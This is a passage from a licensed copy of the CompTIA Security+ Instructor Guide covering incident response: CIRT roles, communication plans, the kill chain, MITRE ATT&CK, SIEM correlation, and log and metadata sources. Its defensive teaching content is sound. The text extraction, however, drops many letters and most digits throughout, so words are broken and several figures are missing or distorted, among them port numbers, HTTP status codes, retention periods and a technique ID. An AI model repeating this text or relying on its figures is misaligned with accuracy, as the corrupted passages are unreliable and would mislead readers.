availability, which will be e pensive to provide. It is also worth considering that
members of the CIRT should be rotated periodically to preclude the possibility of
infiltration. or ma or incidents, e pertise and advice from other business divisions will
also need to be called upon:
• Legal it is important to have access to legal e pertise, so that the team can
evaluate incident response from the perspective of compliance with laws and
industry regulations. It may also be necessary to liaise closely with law enforcement
professionals, and this can be daunting without e pert legal advice.

Lesson 17: Performing Incident Response | Topic 17A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 458 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

• uman esources incident prevention and remediation actions may a ect

employee contracts, employment law, and so on. Incident response requires the
right to intercept and monitor employee communications.

• Marketing—the team is likely to require marketing or public relations input, so that

any negative publicity from a serious incident can be managed.

Some organizations may prefer to outsource some of the CIRT functions to third-party
agencies by retaining an incident response provider. ternal agents are able to deal
more e ectively with insider threats.

Show Slide(s) Communication Plan and Stakeholder Management

Communication Plan
Incident response policies should establish clear lines of communication, both for
and Stakeholder reporting incidents and for notifying a ected parties as the management of an incident
Management progresses. It is vital to have essential contact information readily available.
You must prevent the inadvertent release of information beyond the team authorized
to handle the incident. Status and event details should be circulated on a need-to-know
basis and only to trusted parties identified on a call list.

Communication Plan
Secure communication between the trusted parties of the CIRT is essential for
managing incidents successfully. It is imperative that adversaries not be alerted to
detection and remediation measures about to be taken against them. It may not be
appropriate for all members of the CSIRT to be informed about all incident details.
The team re uires an out of band or o band communication method that cannot
be intercepted. Using corporate email or VoIP runs the risk that the adversary will
be able to intercept communications. One obvious method is cell phones but these
only support voice and te t messaging. or file and data e change, there should
be a messaging system with end to end encryption, such as the ecord T ,
ignal, or hatsApp, or an e ternal email system with message encryption MIM
or PGP). These need to use digital signatures and encryption keys from a system
that is completely separate from the identity management processes of the network
being defended.

Stakeholder Management
Trusted parties might include both internal and e ternal stakeholders. It is not helpful
for an incident to be publicized in the press or through social media outside of planned
communications. Ensure that parties with privileged information do not release this
information to untrusted parties, whether intentionally or inadvertently.
You need to consider obligations to report the attack. It may be necessary to inform
a ected parties during or immediately after the incident so that they can perform their
own remediation. It may be necessary to report to regulators or law enforcement. You
also need to consider the marketing and PR impact of an incident. This can be highly
Show Slide(s)
damaging and you will need to demonstrate to customers that security systems have
been improved.
Incident Response
Plan
Incident Response Plan
Teaching
Tip An incident response plan (IRP) lists the procedures, contacts, and resources
available to responders for various incident categories. The CSIRT should develop
Contrast specific
IRPs with the general profiles or scenarios of typical incidents DDo attack, virus worm outbreak, data
processes of incident e filtration by an e ternal adversary, data modification by an internal adversary, and
response. so on). This will guide investigators in determining priorities and remediation plans. A

Lesson 17: Performing Incident Response | Topic 17A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 459

playbook (or runbook) is a data-driven standard operating procedure (SOP) to assist

unior analysts in detecting and responding to specific cyberthreat scenarios, such as
phishing attempts, L in ection data e filtration, connection to a blacklisted I range,
and so on. The playbook starts with a SIEM report and query designed to detect the
incident and identify the key detection, containment, and eradication steps to take.
Incident categories and definitions ensure that all response team members and other
organizational personnel all have a common base of understanding of the meaning
of terms, concepts, and descriptions. The categories, types, and definitions might vary
according to industry. For a listing of the US federal agency incident categories, you
can visit us cert.cisa.gov sites default files publications ederal Incident Notification
Guidelines.pdf.
ne challenge in incident management is to allocate resources efficiently. This means
that identified incidents must be assessed for severity and prioriti ed for remediation.
There are several factors that can a ect this process
• Data integrity the most important factor in prioriti ing incidents will often be the
value of data that is at risk.

• Downtime another very important factor is the degree to which an incident

disrupts business processes. An incident can either degrade (reduce performance)
or interrupt (completely stop) the availability of an asset, system, or business
process. If you have completed an asset inventory and a thorough risk assessment
of business processes (showing how assets and computer systems assist each
process), then you can easily identify critical processes and quantify the impact of
an incident in terms of the cost of downtime.

• Economic/publicity—both data integrity and downtime will have important

economic e ects, both in the short term and the long term. hort term costs involve
incident response itself and lost business opportunities. Long-term economic costs
may involve damage to reputation and market standing.

• cope the scope of an incident broadly the number of systems a ected is not a
direct indicator of priority. A large number of systems might be infected with a type
of malware that degrades performance, but is not a data breach risk. This might
even be a masking attack as the adversary seeks to compromise data on a single
database server storing top secret information.

• Detection time research has shown that the e istence of more than half of data
breaches are not detected for weeks or months after the intrusion occurs, while in
a successful intrusion data is typically breached within minutes. This demonstrates
that the systems used to search for intrusions must be thorough and the response
to detection must be fast.

• Recovery time—some incidents require lengthy remediation as the system changes

re uired are comple to implement. This e tended recovery period should trigger
heightened alertness for continued or new attacks. Show Slide(s)

Cyber Kill Chain Attack Framework Cyber Kill Chain Attack

Framework
ective incident response depends on threat intelligence. Threat research provides
Teaching
insight into adversary tactics, techniques, and procedures (TTPs). Insights from threat
Tip
research can be used to develop specific tools and playbooks to deal with event
scenarios. A key tool for threat research is a framework to use to describe the stages Relate the use of
attack frameworks
of an attack. These stages are often referred to as a cyber kill chain, following the
to the creation of
in uential white paper Intelligence Driven Computer Network Defense commissioned e ective scenario
by Lockheed Martin (lockheedmartin.com/content/dam/lockheed-martin/rms/ based incident
documents cyber LM hite aper Intel Driven Defense.pdf). response plans.

Lesson 17: Performing Incident Response | Topic 17A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 460 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Stages in the kill chain.

The Lockheed Martin kill chain identifies the following phases

1. Reconnaissance—in this stage the attacker determines what methods to use to
complete the phases of the attack and gathers information about the target's
personnel, computer systems, and supply chain.

2. Weaponization—the attacker couples payload code that will enable access with
e ploit code that will use a vulnerability to e ecute on the target system.

3. Delivery the attacker identifies a vector by which to transmit the weaponi ed

code to the target environment, such as via an email attachment or on a
drive.

4. ploitation the weaponi ed code is e ecuted on the target system by this

mechanism. or e ample, a phishing email may trick the user into running the
code, while a drive by download would e ecute on a vulnerable system without
user intervention.

5. Installation—this mechanism enables the weaponized code to run a remote

access tool and achieve persistence on the target system.

6. Command and control (C2 or C&C)—the weaponized code establishes an

outbound channel to a remote server that can then be used to control the remote
access tool and possibly download additional tools to progress the attack.

7. Actions on ob ectives in this phase, the attacker typically uses the access he
has achieved to covertly collect information from target systems and transfer
it to a remote system data e filtration . An attacker may have other goals or
motives, however.

Show Slide(s) Other Attack Frameworks

Other Attack
Other types of attack framework have been implemented to provide a means of
Frameworks categorizing features of adversary behaviors to make it easier to identify indicators of
such attacks.

MITRE ATT&CK
As an alternative to the life cycle analysis implied by a kill chain, the MITRE
Corporation's Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK)
matrices provide access to a database of known TTPs. This freely available resource

Lesson 17: Performing Incident Response | Topic 17A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 461

(attack.mitre.org tags each techni ue with a uni ue ID and places it in one or more
tactic categories, such as initial access, persistence, lateral movement, or command
and control. The sequence in which attackers may deploy any given tactic category is
not made e plicit. This means analysts must interpret each attack life cycle from local
evidence. The framework makes TT s used by di erent adversary groups directly
comparable, without assuming how any particular adversary will run a campaign at a
strategic level.
There is a matri for enterprise, which can also be viewed as TT s directed against
Linu , mac , and indows hosts, and a second matri for mobile. or e ample, Drive
by Compromise is given the ID T and categori ed as an Initial Access tactic that
can target indows, Linu , and mac hosts. Clicking through to the page accesses
information about detection methods, mitigation methods, and e amples of historic
uses and analysis.

The Diamond Model of Intrusion Analysis

The Diamond Model of Intrusion Analysis suggests a framework to analyze an
intrusion event by e ploring the relationships between four core features
adversary, capability, infrastructure, and victim. These four features are represented
by the four vertices of a diamond shape. Each event may also be described by meta-
features, such as date/time, kill chain phase, result, and so on. Each feature is also
assigned a confidence level C , indicating data accuracy or the reliability of a conclusion
or assumption assigned to the value by analysis.

Intrusion event represented in the iamond odel. (Image eleased to public domain by
Sergio Caltagirone, Andrew Pendergast, and Christopher etz activeresponse.org wp-content
uploads/2013/07/diamond.pdf].)

Incident Response Exercises Show Slide(s)

The procedures and tools used for incident response are difficult to master and Incident Response
e ecute e ectively. ou do not want to be in the situation where first time sta ercises
members are practicing them in the high-pressure environment of an actual incident.
unning test e ercises helps sta develop competencies and can help to identify
deficiencies in the procedures and tools. Training on specific incident response
scenarios can use three forms:
• Tabletop—this is the least costly type of training. The facilitator presents a scenario
and the responders e plain what action they would take to identify, contain, and
eradicate the threat. The training does not use computer systems. The scenario data
is presented as ashcards.

Lesson 17: Performing Incident Response | Topic 17A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 462 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

• Walkthroughs—in this model, a facilitator presents the scenario as for a tabletop

e ercise, but the incident responders demonstrate what actions they would take
in response. nlike a tabletop e ercise, the responders perform actions such as
running scans and analy ing sample files, typically on sandbo ed versions of the
company's actual response and recovery tools.

• imulations a simulation is a team based e ercise, where the red team attempts
an intrusion, the blue team operates response and recovery controls, and a
white team moderates and evaluates the e ercise. This type of training re uires
considerable investment and planning.

embers of entucky and Alabama ational and Air Guard participating in a simulated network
attack exercise. (Image 01 entucky ational Guard.)

IT E have published a white paper that discusses preparing and facilitating incident
response exercises (mitre.org sites default files publications pr 1 - -cyber-exercise-
playbook.pdf).

Show Slide(s) Incident Response, Disaster Recovery, and

etention olic
Incident Response,
Disaster ecovery, and Incident response fits into overall planning for enterprise risk management and
Retention Policy
cybersecurity resilience.
Teaching
Tip
Incident Response versus Disaster Recovery and Business
We will return to these
Continuity
topics in detail later
in the course, so at
ou should distinguish specific incident response planning from other types of
this point ust contrast planning for disaster recovery and business continuity:
these activities with
• Disaster recovery plan a disaster can be seen as a special class of incident where
incident response.
the organi ation's primary business function is disrupted. Disaster recovery re uires
considerable resources, such as shifting processing to a secondary site. Disaster
recovery will involve a wider range of stakeholders than less serious incidents.

Lesson 17: Performing Incident Response | Topic 17A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 463

• Business continuity plan (BCP) this identifies how business processes should
deal with both minor and disaster level disruption. During an incident, a system
may need to be isolated. Continuity planning ensures that there is processing
redundancy supporting the work ow, so that when a server is taken o ine for
security remediation, processing can failover to a separate system. If systems do not
have this sort of planned resilience, incident response will be much more disruptive.

• Continuity of Operation Planning (COOP)—this terminology is used for

government facilities, but is functionally similar to business continuity planning. In
some definitions, C refers specifically to backup methods of performing mission
functions without IT support.

Incident Response, Forensics, and Retention Policy

The incident response process emphasizes containment, eradication, and recovery.
These aims are not entirely compatible with forensics. Digital forensics describes
techniques to collect and preserve evidence that demonstrate that there has been no
tampering or manipulation. Forensics procedures are detailed and time-consuming,
where the aims of incident response are usually urgent. If an investigation must use
forensic collection methods so that evidence is retained, this must be specified early in
the response process.
Retention policy is also important for retrospective incident handling, or threat
hunting. A retention policy for historic logs and data captures sets the period over
which these are retained. You might discover indicators of a breach months or years
after the event. Without a retention policy to keep logs and other digital evidence, it will
not be possible to make any further investigation.

Lesson 17: Performing Incident Response | Topic 17A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 464 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Incident Response Procedures
Answer the following questions:

1. What are the six phases of the incident response life cycle?

reparation, Identification, Containment, radication, ecovery, and Lessons Learned.

2. True or false? It is important to publish all security alerts to all members

o sta

False—security alerts should be sent to those able to deal with them at a given level of
security awareness and on a need-to-know basis.

3. You are providing security consultancy to assist a company with improving

incident response procedures. The business manager wants to know why
an out-of-band contact mechanism for responders is necessary. What do
ou sa

The response team needs a secure channel to communicate over without alerting
the threat actor. There may also be availability issues with the main communication
network, if it has been a ected by the incident.

4. hich attac rame or pro ides descriptions o specific TT s

MITRE's ATT&CK framework.

5. Your consultancy includes a training segment. What type of incident

response exercise will best represent a practical incident handling scenario?

A simulation e ercise creates an actual intrusion scenario, with a red team performing
the intrusion and a blue team attempting to identify, contain, and eradicate it.

Lesson 17: Performing Incident Response | Topic 17A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 465

Topic 17B
Utilize Appropriate Data Sources
or Incident esponse

EXAM OBJECTIVES COVERED Teaching

4.3 Given an incident, utilize appropriate data sources to support an investigation Tip
Keeping the incident
response ob ectives
and content e amples
Security monitoring produces a very large amount of data, and automated detection
together involves
systems can generate a large volume of alerts. Prioritizing and investigating the revisiting SIEM and
most urgent events as incidents and resolving them uickly is a significant challenge log data. Where we
for all types of organization. As a security professional, you must be able to utilize previously focused
appropriate data sources to perform incident identification as efficiently as possible. on log collection,
the focus here is no
reporting from the
Incident Identification SIEM and selecting
appropriate and useful
Identification is the process of collating events and determining whether any of them data sources.
should be managed as incidents or as possible precursors to an incident; that is, an
event that makes an incident more likely to happen. There are multiple channels by Show Slide(s)
which events or precursors may be recorded:
Incident Identification
• sing log files, error messages, ID alerts, firewall alerts, and other resources
to establish baselines and identifying those parameters that indicate a possible Teaching
security incident. Tip
Make sure students
• Comparing deviations to established metrics to recognize incidents and their
understand the "day-
scopes. to-day" of incident
identification and
• Manual or physical inspections of site, premises, networks, and hosts. alerting.
• Notification by an employee, customer, or supplier.

• Public reporting of new vulnerabilities or threats by a system vendor, regulator, the

media, or other outside party.

It is wise to provide for confidential reporting so that employees are not afraid to
report insider threats, such as fraud or misconduct. It may also be necessary to use an
"out-of-band" method of communication so as not to alert the intruder that his or her
attack has been detected.

First Responder
When a suspicious event is detected, it is critical that the appropriate person on
the CI T be notified so that they can take charge of the situation and formulate the
appropriate response. This person is referred to as the first responder. This means
that employees at all levels of the organization must be trained to recognize and
respond appropriately to actual or suspected security incidents. A good level of security
awareness across the whole organization will reduce the incidence of false positives
and negatives. For the most serious incidents, the entire CIRT may be involved in
formulating an e ective response.

esson 1 Performing Incident esponse | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 466 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Anal sis and Incident Identification

hen notification has taken place, the CI T or other responsible person s must
analy e the event to determine whether a genuine incident has been identified and
what level of priority it should be assigned. Analysis will depend on identifying the type
of incident and the data or resources a ected its scope and impact . At this point,
the incident management database should have a record of the event indicators, the
nature of the incident, its impact, and the incident investigator responsible. The ne t
phase of incident management is to determine an appropriate response.

Show Slide(s) Security and Information Event Management

Security and
Coupled with an attack framework, notification will provide a general sense of where
Information Event to look for or e pect indicators of malicious activity. Incident analysis is greatly
Management facilitated by a security information and event management (SIEM) system. A SIEM
parses network traffic and log data from multiple sensors, appliances, and hosts and
normali es the information to standard field types.

Correlation
The I M can then run correlation rules on indicators e tracted from the data sources
to detect events that should be investigated as potential incidents. ou can also filter or
query the data based on the type of incident that has been reported.
Correlation means interpreting the relationship between individual data points to
diagnose incidents of significance to the security team. A I M correlation rule is a
statement that matches certain conditions. These rules use logical e pressions, such as
AND and , and operators, such as == (matches), < (less than), > (greater than), and
in contains . or e ample, a single user logon failure is not a condition that should
raise an alert. Multiple user logon failures for the same account, taking place within
the space of one hour, is more likely to require investigation and is a candidate for
detection by a correlation rule.
Error.LogonFailure > 3 AND LogonFailure.User AND
Duration < 1 hour
As well as correlation between indicators observed on the network, a SIEM is likely to
be configured with a threat intelligence feed. This means that data points observed on
the network can be associated with known threat actor indicators, such as IP addresses
and domain names. AI-assisted analysis enables more sophisticated alerting and
detection of anomalous behavior.

Retention
A I M can enact a retention policy so that historical log and network traffic data is kept
for a defined period. This allows for retrospective incident and threat hunting, and can
be a valuable source of forensic evidence.

Show Slide(s) I ash oards

I M Dashboards
SIEM dashboards are one of the main sources of automated alerts. A SIEM dashboard
provides a console to work from for day-to-day incident response. Separate
dashboards can be created to suit many di erent purposes. An incident handler's
dashboard will contain uncategorized events that have been assigned to their account,
plus visualizations (graphs and tables) showing key status metrics. A manager's
dashboard would show overall status indicators, such as number of unclassified events
for all event handlers.

esson 1 Performing Incident esponse | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 467

The SGUI console in Security Onion. A SIE can generate huge numbers of alerts
that need to be manually assessed for priority and investigation.
(Screenshot courtesy of Security Onion securityonion.net.)

ensiti it and Alerts

One of the greatest challenges in operating a SIEM is tuning the system sensitivity
to reduce false positive indicators being reported as an event. This is difficult firstly
because there isn't a simple dial to turn for overall sensitivity, and secondly because
reducing the number of rules that produce events increases the risk of false negatives.
A false negative is where indicators that should be correlated as an event and raise an
alert are ignored.
The correlation rules are likely to assign a criticality level to each match. or e ample
• Log only—an event is produced and added to the SIEM's database, but it is
automatically classified.

• Alert—the event is listed on a dashboard or incident handling system for an agent to

assess. The agent classifies the event and either dismisses it to the log or escalates it
as an incident.

• Alarm the event is automatically classified as critical and a priority alarm is raised.
This might mean emailing an incident handler or sending a te t message.

Sensors
A sensor is a network tap or port mirror that performs packet capture and intrusion
detection. One of the key uses of a SIEM is to aggregate data from multiple sensors and
log sources, but it might also be appropriate to configure dashboards that show output
from a single sensor or source host.

esson 1 Performing Incident esponse | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 468 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) Trend Anal sis

Trend Analysis Trend analysis is the process of detecting patterns or indicators within a data set
over a time series and using those patterns to make predictions about future events.
A trend is difficult to spot by e amining each event in a log file. Instead, you need
software to visualize the incidence of types of event and show how the number or
frequency of those events changes over time. Trend analysis can apply to frequency,
volume, or statistical deviation:
• Frequency-based trend analysis establishes a baseline for a metric, such as number
of N DN log events per hour of the day. If the fre uency e ceeds or in
some cases undershoots) the threshold for the baseline, then an alert is raised.

• Volume-based trend analysis can be performed with simpler indicators. For

e ample, one simple metric for determining threat level is log volume. If logs
are growing much faster than they were previously, there is a good chance that
something needs investigating. Volume-based analysis also applies to network
traffic. ou might also measure endpoint disk usage. Client workstations don t
usually need to store data locally, so if a host's disk capacity has suddenly
diminished, it could be a sign that it is being used to stage data for e filtration.

• tatistical deviation analysis can show when a data point should be treated as
suspicious. or e ample, a cluster graph might show activity by standard users and
privileged users, invoking analysis of behavioral metrics of what processes each type
runs, which systems they access, and so on. A data point that appears outside the
two clusters for standard and administrative users might indicate some suspicious
activity by that account.

Show Slide(s) Logging Platforms

Logging Platforms
Log data from network appliances and hosts can be aggregated by a SIEM either by
installing a local agent to collect and parse the log data or by using a forwarding system
Teaching
to transmit logs directly to the SIEM server. Also, organizations may not operate a SIEM,
Tip
but still use a logging platform to aggregate log data in a central location.
Focus on syslog, slo
but make sure
students recognize
Syslog (tools.ietf.org/html/rfc3164) provides an open format, protocol, and server
the di erence in the
alternative platforms. software for logging event messages. It is used by a very wide range of host types. For
e ample, syslog messages can be generated by Cisco routers and switches, as well as
servers and workstations. It usually uses D port .
A syslog message comprises a PRI code, a header containing a timestamp and host
name, and a message part. The PRI code is calculated from the facility and a severity
level. The message part contains a tag showing the source process plus content.
The format of the content is application dependent. It might use space- or comma-
delimited fields or name value pairs, such as J N data.

C (tools.ietf.org html rfc ) ad usts the structure slightly to split the tag into app
name, process I , and message I fields, and to make them part of the header.

Rsyslog and Syslog-ng

There have been two updates to the original syslog specification
• syslog uses the same configuration file synta , but can work over TC and
use a secure connection. syslog can use more types of filter e pressions in its
configuration file to customi e message handling.

esson 1 Performing Incident esponse | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 469

• yslog ng uses a di erent configuration file synta , but can also use TC secure
communications and more advanced options for message filtering.

journalctl
In Linu , te t based log files of the sort managed by syslog can be viewed using
commands such as cat, tail, and head. Most modern Linu distributions now
use systemd to initialize the system and to start and manage background services.
ather than writing events to syslog format te t files, logs from processes managed
by systemd are written to a binary format file called ournald. vents captured by
ournald can be forwarded to syslog. To view events in ournald directly, you can use
the journalctl command to print the entire ournal log, or you can issue various
options with the command to filter the log in a variety of ways, such as matching a
service name or only printing messages matching the specified severity level.

NXlog
NXlog (n log.co) is an open-source log normalization tool. One principal use for it is
to collect Windows logs, which use an XML-based format, and normalize them to a
syslog format.

et or and ecurit o iles Show Slide(s)

Log file data is a critical resource for investigating security incidents. As well as the Network, OS, and
log format, you must also consider the range of sources for log files and know how to ecurity Log iles
determine what type of log file will best support any given investigation scenario.
Teaching
stem and ecurit o s Tip
Emphasize that relying
One source of security information is the event log from each network server or client.
on the default logging
ystems such as Microsoft indows, Apple mac , and Linu keep a variety of logs to options is unlikely to
record events as users and software interact with the system. The format of the logs be sufficient. Audit
varies depending on the system. Information contained within the logs also varies by logs in particular
system, and in many cases, the type of information that is captured can be configured. require careful tuning
to provide an e ective
When events are generated, they are placed into log categories. These categories audit trail and enforce
describe the general nature of the events or what areas of the they a ect. The five accountability and
main categories of Windows event logs are: non-repudiation.
We do mention it
• Application—events generated by applications and services, such as when a service elsewhere, but you
cannot start. may want to remind
students that sysmon
• ecurity audit events, such as a failed logon or access to a file being denied. is very widely used
for Windows security
• System—events generated by the operating system and its services, such as storage logging (github.com/
volume health checks. SwiftOnSecurity/
sysmon config).
• Setup—events generated during the installation of Windows.

• Forwarded Events—events that are sent to the local log from other hosts.

Network Logs
Network logs are generated by appliances such as routers, firewalls, switches, and
access points. Log files will record the operation and status of the appliance itself the
system log for the appliance plus traffic and access logs recording network behavior,
such as a host trying to use a port that is blocked by the firewall, or an endpoint trying
to use multiple MAC addresses when connected to a switch.

esson 1 Performing Incident esponse | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 470 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Authentication Logs
Authentication attempts for each host are likely to be written to the security log. You
might also need to inspect logs from the servers authori ing logons, such as ADI
and TACAC servers or indows Active Directory AD servers.

Vulnerability Scan Output

A vulnerability scan report is another important source when determining how an
attack might have been made. The scan engine might log or alert when a scan report
contains vulnerabilities. The report can be analyzed to identify vulnerabilities that have
not been patched or configuration weaknesses that have not been remediated. These
can be correlated to recently developed e ploits.

Show Slide(s) Application Log Files

Application Log Files
An application log file is simply one that is managed by the application rather than
the OS. The application may use Event Viewer or syslog to write event data using a
Teaching standard format, or it might write log files to its own application directories in whatever
Tip format the developer has selected.
You don't need to
go through these in DNS Event Logs
detail in class. Just
make sure students A DN server may log an event each time it handles a re uest to convert between a
know what type of domain name and an I address. DN event logs can hold a variety of information that
information can be may supply useful security intelligence, such as:
retrieved from each
type of data source. • The types of ueries a host has made to DN .

• Hosts that are in communication with suspicious IP address ranges or domains.

• tatistical anomalies such as spikes or consistently large numbers of DN

lookup failures, which may point to computers that are infected with malware,
misconfigured, or running obsolete or faulty applications.

e TT Access o s
eb servers are typically configured to log TT traffic that encounters an error or
traffic that matches some predefined rule set. Most web servers use the common log
format CL or C e tended log file format to record the relevant information.
The status code of a response can reveal quite a bit about both the request and the
server's behavior. Codes in the 400 range indicate client-based errors, while codes in
the range indicate server based errors. or e ample, repeated orbidden
responses may indicate that the server is re ecting a client's attempts to access
resources they are not authori ed to. A ad ateway response could indicate
that communications between the target server and its upstream server are being
blocked, or that the upstream server is down.
In addition to status codes, some web server software also logs HTTP header
information for both requests and responses. This can provide you with a better
picture of the makeup of each request or response, such as cookie information and
MIM types. Another header field of note is the ser Agent field, which identifies
the type of application making the request. In most cases, this is the version of the
browser that the client is using to access a site, as well as the client's operating system.
However, this can be misleading, as even a browser like Microsoft Edge includes
versions of Google Chrome and Safari in its User-Agent string. Therefore, the User-
Agent field may not be a reliable indicator of the client's environment.

esson 1 Performing Incident esponse | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 471

oI and Call ana ers and ession Initiation rotocol I Tra c

Many VoIP systems use the Session Initiation Protocol (SIP) to identify endpoints and
setup calls. The call content is transferred using a separate protocol, typically the Real
Time Protocol (RTP). VoIP protocols are vulnerable to most of the same vulnerabilities
and e ploits as web communications. oth I and T should use the secure
protocol forms, where endpoints are authenticated and communications protected by
Transport Layer Security (TLS).
The call manager is a gateway that connects endpoints within the local network and
over the Internet. The call manager is also likely to implement a media gateway to
connect VoIP calls to cellphone and landline telephone networks. SIP produces similar
logs to MT , typically in the common log format. A I log will identify the endpoints
involved in a call request, plus the type of connection (voice only or voice with video,
for instance), and status messaging. When handling requests, the call manager and
any other intermediate servers add their IP address in a Via header, similar to per-
hop MT headers. Inspecting the logs might reveal evidence of a man in the middle
attack where an unauthori ed pro y is intercepting traffic. oI systems connected to
telephone networks are also targets for toll fraud. The call manager's access log can be
audited for suspicious connections.

Dump Files
System memory contains volatile data. A system memory dump creates an image
file that can be analy ed to identify the processes that are running, the contents of
temporary file systems, registry data, network connections, cryptographic keys, and
more. It can also be a means of accessing data that is encrypted when stored on a
mass storage device.

Metadata Show Slide(s)

Metadata is the properties of data as it is created by an application, stored on media, Metadata

or transmitted over a network. A number of metadata sources are likely to be useful
when investigating incidents, because they can establish timeline questions, such as
when and where, as well as containing other types of evidence.

File
ile metadata is stored as attributes. The file system tracks when a file was created,
accessed, and modified. A file might be assigned a security attribute, such as marking
it as read only or as a hidden or system file. The ACL attached to a file showing its
permissions represents another type of attribute. inally, the file may have e tended
attributes recording an author, copyright information, or tags for inde ing searching. In
Linu , the ls command can be used to report file system metadata.

Web
When a client requests a resource from a web server, the server returns the resource
plus headers setting or describing its properties. Also, the client can include headers
in its request. One key use of headers is to transmit authorization information, in
the form of cookies. eaders describing the type of data returned te t or binary, for
instance) can also be of interest. The contents of headers can be inspected using the
standard tools built into web browsers. Header information may also be logged by a
web server.

Email
An email's Internet header contains address information for the recipient and sender,
plus details of the servers handling transmission of the message between them. When

esson 1 Performing Incident esponse | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 472 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

an email is created, the mail user agent (MUA) creates an initial header and forwards
the message to a mail delivery agent MDA . The MDA should perform checks that the
sender is authorized to issue messages from the domain. Assuming the email isn't
being delivered locally at the same domain, the MDA adds or amends its own header
and then transmits the message to a message transfer agent (MTA). The MTA routes
the message to the recipient, with the message passing via one or more additional
MTAs, such as SMTP servers operated by ISPs or mail security gateways. Each MTA
adds information to the header.
eaders aren't e posed to the user by most email applications, which is why they're
usually not a factor in an average user's udgment. ou can view and copy headers
from a mail client via a message properties/options/source command. MTAs can add
a lot of information in each received header, such as the results of spam checking. If
you use a plainte t editor to view the header, it can be difficult to identify where each
part begins and ends. Fortunately, there are plenty of tools available to parse headers
and display them in a more structured format. ne e ample is the Message Analy er
tool, available as part of the Microsoft Remote Connectivity Analyzer (testconnectivity.
microsoft.com tests o ). This will lay out the hops that the message took more
clearly and break out the headers added by each MTA.

Mobile
Mobile phone metadata comprises call detail records CD s of incoming, outgoing,
and attempted calls and M te t time, duration, and the opposite party's number.
Metadata will also record data transfer volumes. The location history of the device
can be tracked by the list of cell towers it has used to connect to the network. If you
are investigating a suspected insider attack, this metadata could prove a suspect's
whereabouts. Furthermore, AI-enabled analysis (or patient investigation) can
correlate the opposite party numbers to businesses and individuals through other
public records.
CD s are generated and stored by the mobile operator. The retention period for CD s
is determined by national and state laws, but is typically around months. CD s are
directly available for corporate-owned devices, where you can request them from the
communications provider as the owner of the device. Metadata for personally owned
devices would only normally be accessible by law enforcement agencies by subpoena
or with the consent of the account holder. An employment contract might require an
employee to give this consent for bring your own device D mobiles used within
the workplace.

Metadata such as current location and time is also added to media such as photos and
videos, though this is true for all types of computing device. hen these files are uploaded
to social media sites, they can reveal more information than the uploader intended.

Show Slide(s) Network Data Sources

Network Data ources
Network data is typically analyzed in detail at the level of individual frames or using
summary statistics of traffic ows and protocol usage.

Protocol Analyzer Output

A I M will store details from sensors at di erent points on the network. Information
captured from network packets can be aggregated and summarized to show overall
protocol usage and endpoint activity. The contents of packets can also be recorded for
analysis. Recording the full data of every packet—referred to as retrospective network
analysis (RNA)—is too costly for most organizations. Typically, packet contents are only
retained when indicators from the traffic are correlated as an event. The I M software

esson 1 Performing Incident esponse | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 473

will provide the ability to pivot from the event or alert summary to the underlying
packets. Detailed analysis of the packet contents can help to reveal the tools used in an
attack. It is also possible to e tract binary files such as potential malware for analysis.

et o I I
A ow collector is a means of recording metadata and statistics about network traffic
rather than recording each frame. Network traffic and ow data may come from a wide
variety of sources or probes , such as switches, routers, firewalls, web pro ies, and so
forth. Flow analysis tools can provide features such as:
• ighlighting of trends and patterns in traffic generated by particular applications,
hosts, and ports.

• Alerting based on detection of anomalies, ow analysis patterns, or custom triggers.

• Visualization tools that enable you to quickly create a map of network connections
and interpret patterns of traffic and ow data.

• Identification of traffic patterns revealing rogue user behavior, malware in transit,

tunneling, applications e ceeding their allocated bandwidth, and so forth.

• Identification of attempts by malware to contact a handler or command control

(C&C) channel.

NetFlow is a Cisco developed means of reporting network ow information to a

structured database. NetFlow has been redeveloped as the IP Flow Information
Export (IPFIX) IETF standard (tools.ietf.org/html/rfc7011 . A particular traffic ow can
be defined by packets sharing the same characteristics, referred to as keys, such as I
source and destination addresses and protocol type. A selection of keys is called a ow
label, while traffic matching a ow label is called a ow record.
You can use a variety of NetFlow monitoring tools to capture data for point-in-
